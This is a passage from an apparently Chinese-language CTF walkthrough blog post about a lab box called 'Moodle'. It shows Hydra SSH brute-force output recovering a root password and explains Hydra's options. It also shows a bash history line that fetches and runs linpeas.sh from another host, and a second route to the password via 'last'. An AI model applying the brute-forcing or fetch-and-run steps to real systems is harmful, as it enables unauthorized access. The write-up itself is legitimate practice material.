class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;PubkeyAuthentication&quot;</span> - 8 of 54060 [child 2] (0/0)</span><br><span class="line">[22][ssh] host: 192.168.3.192   login: root   password: sF6Kfzr69w7dyZALAhl6</span><br><span class="line">[STATUS] attack finished <span class="keyword">for</span> 192.168.3.192 (valid pair found)</span><br><span class="line">1 of 1 target successfully completed, 1 valid password found</span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-13 22:52:50</span><br></pre></td></tr></table></figure>
<p><strong>爆破结果</strong><br><code>user</code>: <code>root</code><br><code>pass</code>: <code>sF6Kfzr69w7dyZALAhl6</code></p>
<blockquote>
<p>[!NOTE] 代码说明</p>
<ul>
<li><p><code>-I</code>：忽略之前的破解缓存记录，<strong>强制重新开始新一轮破解</strong>。Hydra 默认会记录已尝试过的用户名 &#x2F; 密码组合（避免重复尝试），生成缓存文件，<code>-I</code> 参数会跳过缓存，从头开始遍历字典文件。</p>
</li>
<li><p><code>-f</code>：<strong>找到第一个有效（正确）的用户名 &#x2F; 密码组合后，立即停止破解</strong>，不再继续遍历字典文件剩余内容。适合只需要获取一个有效凭据的场景，能节省大量时间。</p>
</li>
<li><p><code>-vV</code>：开启<strong>最高级别的详细输出模式</strong>（<code>-v</code> 为详细模式，<code>-V</code> 为更详细的冗余模式，叠加 <code>-vV</code> 输出最完整的日志）。会显示每个尝试的密码组合、连接状态、破解进度、最终结果等，方便排查问题和查看破解过程。- <code>-t 4</code>：指定本次破解的<strong>并发线程数为 4</strong>。即同时开启 4 个连接尝试密码，线程数越高破解速度相对越快，但过高可能会被目标主机的防火墙、SSH 服务限制（如触发连接频率限制），通常建议 4-10 个线程。</p>
</li>
<li><p><code>-l root</code>：指定<strong>单个固定的登录用户名 <code>root</code></strong>（小写 <code>l</code>，对应 <code>login</code>）。该参数用于指定单一用户名，若需要批量尝试多个用户名，需使用大写 <code>-L</code> 后跟用户名字典文件（如 <code>-L user.txt</code>）。</p>
</li>
<li><p><code>-P a.txt</code>：指定<strong>密码字典文件为 <code>a.txt</code></strong>（大写 <code>P</code>，对应 <code>password</code>）。该文件需提前准备，格式为每行一个密码，Hydra 会逐行读取文件中的密码进行尝试。注意区分小写 <code>-p</code>（用于指定单个固定密码，如 <code>-p 123456</code>）。</p>
</li>
</ul>
</blockquote>
<p>进入<code>root</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">kotori@Moodle:~$ su</span><br><span class="line">Password: </span><br><span class="line">root@Moodle:/home/kotori# <span class="built_in">ls</span></span><br><span class="line">a.txt  linpeas.sh  user.txt</span><br><span class="line">root@Moodle:/home/kotori# <span class="built_in">id</span></span><br><span class="line">uid=0(root) gid=0(root) <span class="built_in">groups</span>=0(root)</span><br><span class="line">root@Moodle:/home/kotori# <span class="built_in">cat</span> user.txt </span><br><span class="line">flag&#123;user-de7202216bc84a6aa04762061c9e9ad2&#125;</span><br><span class="line">root@Moodle:/home/kotori# <span class="built_in">cd</span> /root</span><br><span class="line">root@Moodle:~# <span class="built_in">ls</span></span><br><span class="line">rootpass.txt  root.txt</span><br><span class="line">root@Moodle:~# <span class="built_in">cat</span> root.txt </span><br><span class="line">flag&#123;root-ea6233d6aa262b93419775a51a8cc1df&#125;</span><br></pre></td></tr></table></figure>

<h3 id="方案二"><a href="#方案二" class="headerlink" title="方案二"></a>方案二</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">kotori@Moodle:~$ <span class="built_in">cat</span> .bash_history </span><br><span class="line">last</span><br><span class="line"><span class="built_in">exit</span></span><br><span class="line"><span class="built_in">ls</span> al</span><br><span class="line"><span class="built_in">ls</span>- al</span><br><span class="line">wget 192.168.3.94/linpeas.sh</span><br><span class="line">bash linpeas.sh </span><br><span class="line"><span class="built_in">exit</span></span><br></pre></td></tr></table></figure>

<p>![[Pasted image 20260113230641.png]]<br><code>last</code>默认只显示精简的登录记录，要查看详细信息，使用 <code>-F</code>（完整时间）、<code>-i</code>（显示<code>IP</code> 数字格式）、<code>-w</code>（完整用户名）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">kotori@Moodle:~$ last -F -i -w</span><br><span class="line">kotori   pts/1        192.168.3.48     Tue Jan 13 09:45:18 2026   still logged <span class="keyword">in</span></span><br><span class="line">reboot   system boot  0.0.0.0          Tue Jan 13 08:45:58 2026   still running</span><br><span class="line">root     pts/0        192.168.3.94     Fri Dec 26 23:13:35 2025 - crash                    (17+09:32)</span><br><span class="line">reboot   system boot  0.0.0.0          Fri Dec 26 23:13:00 2025   still running</span><br><span class="line">sF6Kfzr69w7dyZALAhl6 pts/1        192.168.3.94  </span><br><span class="line">·······</span><br></pre></td></tr></table></figure>
<p>![[Pasted image 20260113230744.png]]<br>同样获得密码 <code>sF6Kfzr69w7dyZALAhl6</code></p>

  </div>
</article>



    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E6%90%9C%E5%AF%BB"><span class="toc-number">1.</span> <span class="toc-text">1.搜寻</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#nmap"><span class="toc-number">1.1.</span> <span class="toc-text">nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wfuzz-%E5%AD%90%E5%9F%9F%E5%90%8D"><span class="toc-number">1.2.</span> <span class="toc-text">wfuzz 子域名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dirsearch"><span class="toc-number">1.3.</span> <span class="toc-text">dirsearch</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">2.分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#curl"><span class="toc-number">2.1.</span> <span class="toc-text">curl</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#login"><span class="toc-number">2.2.</span> <span class="toc-text">login</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hackbar"><span class="toc-number">2.3.</span> <span class="toc-text">hackbar</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E8%BF%9B%E5%85%A5%E7%B3%BB%E7%BB%9F"><span class="toc-number">3.</span> <span class="toc-text">3.进入系统</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%A1%88%E4%B8%80"><span class="toc-number">3.1.</span> <span class="toc-text">方案一</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%A1%88%E4%BA%8C"><span class="toc-number">3.2.</span> <span class="toc-text">方案二</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/"><i class="fa fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&text="><i class="fa fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&title="><i class="fa fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&is_video=false&description="><i class="fa fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/"><i class="fa fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&title="><i class="fa fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&title="><i class="fa fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&title="><i class="fa fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&title="><i class="fa fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://zhaochoudecat.github.io/2026/01/10/QQGroup/Moddle/Moddle/&name=&description="><i class="fa fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
      <ul>
        <li id="toc"><a class="icon" href="#" onclick='$("#toc-footer").toggle();return false;'><i class="fa fa-list fa-lg" aria-hidden="true"></i> TOC</a></li>
        <li id="share"><a class="icon" href="#" onclick='$("#share-footer").toggle();return false;'><i class="fa fa-share-alt fa-lg" aria-hidden="true"></i> Share</a></li>
        <li id="top" style="display:none"><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a></li>
        <li id="menu"><a class="icon" href="#" onclick='$("#nav-footer").toggle();return false;'><i class="fa fa-bars fa-lg" aria-hidden="true"></i> Menu</a></li>
      </ul>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2026 zhaochoudecat
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

</body>
</html>
<!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<link rel="stylesheet" href="/lib/meslo-LG/styles.css">


<link rel="stylesheet" href="/lib/justified-gallery/justifiedGallery.min.css">



<!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/jquery.justifiedGallery.min.js"></script>


<script src="/js/main.js"></script>

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-86660611-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Disqus Comments -->


